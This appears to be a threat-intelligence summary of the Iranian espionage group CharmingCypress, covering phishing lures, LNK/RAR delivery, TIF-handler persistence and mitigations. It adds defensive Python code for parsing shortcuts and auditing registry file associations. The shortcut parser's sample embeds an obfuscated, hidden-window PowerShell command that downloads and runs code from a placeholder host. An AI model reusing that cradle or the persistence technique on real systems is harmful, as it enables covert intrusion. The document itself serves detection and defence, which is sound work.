Full Report
Through its managed security services offerings, Volexity routinely identifies spear-phishing campaigns targeting its customers. One persistent threat actor, whose campaigns Volexity frequently observes, is the Iranian-origin threat actor CharmingCypress (aka Charming Kitten, APT42, TA453). Volexity assesses that CharmingCypress is tasked with collecting political intelligence against foreign targets, particularly focusing on think tanks, NGOs, and journalists. In their phishing campaigns, CharmingCypress often employs unusual social-engineering tactics, such as engaging targets in prolonged conversations over email before sending links to malicious content. In a particularly notable spear-phishing campaign observed by Volexity, CharmingCypress went so far as to craft an entirely fake webinar platform to use as part of the lure. CharmingCypress controlled access to this platform, requiring targets to install malware-laden VPN applications prior to granting access. Note: Some content in this blog was recently discussed in Microsoft’s report, New TTPs observed in Mint Sandstorm campaign targeting high-profile individuals at universities and […] The post CharmingCypress: Innovating Persistence appeared first on Volexity.
Analysis Summary
# Threat Actor: CharmingCypress
## Attribution & Identity
* **Origin:** Iranian-origin threat actor.
* **Known Aliases/Associated Groups:** Charming Kitten, APT42, TA453.
* **Assessment:** Volexity assesses that the group is tasked with collecting political intelligence against foreign targets, with a particular focus on think tanks, NGOs, and journalists.
## Activity Summary
CharmingCypress conducts persistent, high-effort spear-phishing campaigns, which Volexity observed frequently throughout 2023 and into early 2024. The actor engages targets in prolonged email conversations before delivering malicious content. One notable campaign impersonated the Rasanah International Institute for Iranian Studies (IIIS) using typo-squatted domains (look-alikes of rasanah-iiis[.]org) and a fake webinar platform; access to the platform was gated behind installing malware-laden VPN applications, so the "registration" step was the infection step. The actor is highly committed to its targets and readily adapts its techniques to compromise specific individuals.
## Tactics, Techniques & Procedures
- **Spear Phishing:** Used extensively, often spoofing individuals from legitimate organizations (media, research institutions). Demonstrates "Multi-Persona Impersonation": several actor-controlled email accounts, each posing as a different person, take part in the same thread so the pretext appears corroborated by colleagues.
- **Social Engineering:** Engaging targets in long conversations before delivering links. Impersonating organizations to establish a viable pretext for contact.
- **Delivery Mechanism:** RAR archives containing malicious Windows shortcut (LNK) files; the shortcut runs the next stage when the victim opens what looks like a document.
- **Initial Access:** Redirection chains that end in the download of a password-protected RAR archive hosted on legitimate cloud infrastructure (e.g., Supabase storage); the password prevents inline scanning of the archive contents at the mail gateway or proxy.
- **Obfuscation:** Commands embedded in the LNK files are obscured with string replacement, so the real command only exists after the replacements execute; signatures written against the raw shortcut arguments will miss it.
- **Persistence/Backup C2:** Registering the EYEGLASS malware as the default handler for TIF (Tagged Image File Format) files. If the primary C2 channel is lost, the actor can regain execution simply by emailing the victim a specially crafted TIF file: opening the "image" launches the backdoor again without any new exploit or lure installation.
- **Impersonation Lures:** LNK files were named after recent articles from credible sources (e.g., Atlantic Council) to appear relevant to policy experts.
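Added example for the delivery and obfuscation items above (not Volexity's tooling, and not the actor's actual shortcut): a minimal parser for the Shell Link (.lnk) format that pulls the target and arguments out of a shortcut, a resolver for string-replacement chains in the PowerShell `('...').Replace('a','b')` idiom (assumed here as one concrete form of the technique the page names), and a few triage signals. The shortcut is built in-code so the script runs offline; the embedded command, its `~`/`!` substitution scheme and the `http://example.invalid` URL are constructed for illustration.

```python
"""Extract the command line from a Windows shortcut (.lnk) and undo
string-replacement obfuscation.

Added example, not Volexity's tooling. The shortcut is built in-code with a
minimal MS-SHLLINK writer so this runs offline; the PowerShell command, its
'~'/'!' substitution scheme and the http://example.invalid URL are constructed
for illustration and are not taken from the campaign."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-0046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7          # window opens minimised and unfocused
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe")


def build_lnk(rel_path, working_dir, arguments, show_cmd=SW_SHOWMINNOACTIVE):
    """0x4C-byte ShellLinkHeader followed by three UTF-16LE StringData fields."""
    flags = HAS_REL_PATH | HAS_WORKING_DIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20,             # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,          # creation / access / write FILETIME
                         0, 0, show_cmd,   # FileSize, IconIndex, ShowCommand
                         0, 0, 0, 0)       # HotKey, Reserved1..3

    def string_data(s):                    # CountCharacters (u16) + chars, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + b"".join(map(string_data, (rel_path, working_dir, arguments)))


def parse_lnk(data):
    """Return ShowCommand and whichever StringData fields the flags say are present."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (show_cmd,) = struct.unpack_from("<I", data, 0x3C)
    off = 0x4C
    if flags & HAS_ID_LIST:                # LinkTargetIDList: u16 size + IDList
        (id_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_size
    if flags & HAS_LINK_INFO:              # LinkInfo: u32 total size, self-describing
        (info_size,) = struct.unpack_from("<I", data, off)
        off += info_size
    fields = {"show_command": show_cmd}
    width = 2 if flags & IS_UNICODE else 1  # ANSI shortcuts assumed cp1252 here
    for bit, name in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, off)
        off += 2
        raw = data[off:off + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        off += count * width
    return fields


# ('literal').Replace('old','new')...  PowerShell single-quoted strings escape ' as ''.
_LITERAL_CHAIN = re.compile(
    r"\(\s*'((?:[^']|'')*)'\s*\)"
    r"((?:\s*\.replace\(\s*'(?:[^']|'')*'\s*,\s*'(?:[^']|'')*'\s*\))+)", re.IGNORECASE)
_REPLACE_CALL = re.compile(
    r"\.replace\(\s*'((?:[^']|'')*)'\s*,\s*'((?:[^']|'')*)'\s*\)", re.IGNORECASE)


def deobfuscate(command):
    """Resolve ('...').Replace(a,b) chains until none remain; nested chains fall out
    of the loop. .NET String.Replace is ordinal, so str.replace matches it exactly."""
    def resolve(m):
        text = m.group(1).replace("''", "'")
        for old, new in _REPLACE_CALL.findall(m.group(2)):
            text = text.replace(old.replace("''", "'"), new.replace("''", "'"))
        return "'" + text.replace("'", "''") + "'"
    prev = None
    while prev != command:
        prev, command = command, _LITERAL_CHAIN.sub(resolve, command)
    return command


def triage(fields):
    """Cheap signals that a shortcut is a launcher rather than a link to a document."""
    reasons = []
    args = fields.get("arguments", "")
    if fields.get("relative_path", "").lower().endswith(SCRIPT_HOSTS):
        reasons.append("target is a script host")
    if re.search(r"-w(?:indowstyle)?\s+hidden", args, re.IGNORECASE):
        reasons.append("hidden window requested")
    if _LITERAL_CHAIN.search(args):
        reasons.append("string-replacement obfuscation")
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("starts minimised")
    return reasons


# Constructed lure: the command below is illustrative, not from the campaign.
SAMPLE_ARGS = ("-NoP -W Hidden -c \"$u='http://example.invalid/s1';"
               "iex(('i~x (N~w-Obj~ct N~t.W~bCli~nt).DownloadStr!ng($u)')"
               ".Replace('~','e').Replace('!','i'))\"")
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32", SAMPLE_ARGS)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)          # for a real sample: open(path, "rb").read()
    print("target   :", fields["relative_path"])
    print("raw args :", fields["arguments"])
    print("resolved :", deobfuscate(fields["arguments"]))
    print("triage   :", ", ".join(triage(fields)))
```

The parser skips the LinkTargetIDList and LinkInfo blocks by their declared sizes, so real-world shortcuts that carry them parse the same way; the resolver only handles the `.Replace()` idiom, so other layers (`-join`, char-code arrays, `-f` formatting) still need to be peeled separately.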
## Targeting
* **Sectors:** Think tanks, NGOs, journalists, academics, and policy experts.
* **Geography:** Foreign targets (implied by the nature of political intelligence collection).
* **Victims:** Individuals affiliated with research/academic organizations and policy experts.
## Tools & Infrastructure
* **Malware Families Used:**
* POWERSTAR (aka GorjolEcho)
* NOKNOK
* POWERLESS (New observation in recent campaigns)
* BASICSTAR (Appears to be new Visual Basic malware)
* EYEGLASS (the backdoor documented as MediaPl in the Microsoft report referenced above)
* **Data Theft Tools:** Nirsoft Chrome History Viewer, RATHOLE, SNAILPROXY, CommandCam.
* **Infrastructure:**
* C2/Delivery URLs observed using: `hxxps://cloud-document-edit.onrender[.]com/`
* File Hosting for RAR archives observed on: `hxxps://wulpfsrqupnuqorhexiw.supabase[.]co/`
* Use of WhatsApp and Signal phone numbers for deceptive communication.
* **Other Artifacts:** Command-line copies of WinRAR and 7-Zip were identified on compromised systems, consistent with the actor staging and extracting archives itself rather than relying on whatever the victim had installed.
## Implications
CharmingCypress represents a highly persistent, well-resourced, and adaptive threat actor dedicated to long-term political intelligence gathering. Its willingness to invest significant effort in complex social engineering (such as a custom webinar platform) and to keep refreshing its malware toolkit (introducing BASICSTAR, adopting POWERLESS, and adding the TIF-handler fallback) indicates a mature capability; defenses should be tuned specifically to these lures and to the shortcut-and-archive delivery chain rather than relying on generic phishing controls.
## Mitigations
- Exercise extreme caution with unsolicited emails, especially when they involve engagement in prolonged discussions before delivering attachments or links.
- Be wary of lures impersonating known, legitimate organizations, especially regarding academic or political collaboration (e.g., fake webinars).
- Implement robust endpoint detection and response to monitor for suspicious execution chains involving RAR/LNK files, for example a shortcut extracted from an archive spawning PowerShell, cmd.exe, or a script host, especially with a hidden window.
- Baseline and monitor file-type associations: alert on changes to the .tif/.tiff handler (the UserChoice key under Explorer\FileExts and the .tif and ProgId keys under HKCU and HKLM Software\Classes), and treat any image handler that launches a script host or a binary from a user-writable path as an incident rather than a misconfiguration.
- Enhance network monitoring for command-and-control beaconing associated with the observed malware families (POWERSTAR, NOKNOK, POWERLESS, BASICSTAR, EYEGLASS).
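Added example for the TIF-handler persistence item and the file-association mitigation above (not from the Volexity report): an audit of which program Windows will launch for `.tif` files, with the association chain read from the live registry on Windows and a pure `assess()` function that can also be run over exported snapshots. The heuristics (script hosts, user-writable paths, script extensions, per-user override) are the editor's; the two registry snapshots are constructed, and the "hijacked" one is an assumed layout, not EYEGLASS's actual registration, which this page does not describe.

```python
"""Audit the .tif/.tiff file association for signs of a hijacked handler.

Added example, not from the Volexity report. assess() is OS-independent and
works on snapshots; read_association() needs Windows. The snapshots below are
constructed, and HIJACKED is an assumed layout, not EYEGLASS's real
registration."""
import re
try:
    import winreg            # Windows only
except ImportError:
    winreg = None

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# rundll32.exe is deliberately absent: the stock TIFImage.Document handler is
# rundll32 loading PhotoViewer.dll, so listing it would flag every clean host.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd|hta)\b", re.IGNORECASE)


def executable_of(command):
    """First token of a shell\\open\\command value, quoted or not; env vars left as-is."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ", 1)[0]


def assess(progids, commands):
    """progids: {source: ProgId} in precedence order; commands: {ProgId: open command}.
    Returns human-readable findings; an empty list means nothing looked wrong."""
    findings = []
    for source, progid in progids.items():
        if source == "HKCU Classes":      # per-user .tif key shadows the machine default
            findings.append(f"{source}: per-user .tif override to {progid} (verify)")
        cmd = commands.get(progid)
        if cmd is None:                   # packaged apps use DelegateExecute, no command
            continue
        low = cmd.lower()
        exe = re.split(r"[\\/]", executable_of(cmd))[-1].lower()
        if exe in SCRIPT_HOSTS:
            findings.append(f"{source}: {progid} opens images with {exe}")
        hits = [p.strip("\\") for p in USER_WRITABLE if p in low]
        if hits:
            findings.append(f"{source}: {progid} runs from user-writable path ({', '.join(hits)})")
        m = SCRIPT_EXT.search(cmd)
        if m:
            findings.append(f"{source}: {progid} hands the file to a script ({m.group(0)})")
    return findings


def read_association(ext=".tif"):
    """Collect the association chain from the live registry (Windows only).
    HKCR is HKCU\\Software\\Classes merged over HKLM\\Software\\Classes, HKCU winning."""
    if winreg is None:
        raise RuntimeError("live registry reads need Windows")

    def default_of(root, path):
        try:
            with winreg.OpenKey(root, path) as key:
                return winreg.QueryValue(key, None) or None
        except OSError:
            return None

    progids = {}
    try:
        path = rf"Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\{ext}\UserChoice"
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            progids["HKCU UserChoice"] = winreg.QueryValueEx(key, "ProgId")[0]
    except OSError:
        pass
    for label, root in (("HKCU Classes", winreg.HKEY_CURRENT_USER),
                        ("HKLM Classes", winreg.HKEY_LOCAL_MACHINE)):
        value = default_of(root, rf"Software\Classes\{ext}")
        if value:
            progids[label] = value
    commands = {}
    for progid in set(progids.values()):
        for root in (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE):
            cmd = default_of(root, rf"Software\Classes\{progid}\shell\open\command")
            if cmd:
                commands[progid] = cmd
                break
    return progids, commands


# Constructed snapshots, not captured from a real host.
CLEAN = (
    {"HKLM Classes": "TIFImage.Document"},
    {"TIFImage.Document": r'%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1'},
)
HIJACKED = (  # assumed layout: a per-user ProgId pointing at a script in %TEMP%
    {"HKCU Classes": "tiffile_auto", "HKLM Classes": "TIFImage.Document"},
    {"tiffile_auto": r'"C:\Windows\System32\wscript.exe" //B "C:\Users\jdoe\AppData\Local\Temp\viewer.vbs" "%1"',
     "TIFImage.Document": CLEAN[1]["TIFImage.Document"]},
)

if __name__ == "__main__":
    if winreg is not None:
        for ext in (".tif", ".tiff"):
            progids, commands = read_association(ext)
            print(ext, progids, assess(progids, commands) or "no findings")
    else:
        print("clean   :", assess(*CLEAN) or "no findings")
        print("hijacked:", *assess(*HIJACKED), sep="\n  ")
```

Run it per user, not just as SYSTEM: the UserChoice and HKCU\Software\Classes keys live in each user's hive, which is exactly where a per-user hijack would be placed, and a check run only under the machine context never sees them. Treat the per-user override finding as a prompt to look, not a verdict; per-user application installs legitimately create the same key.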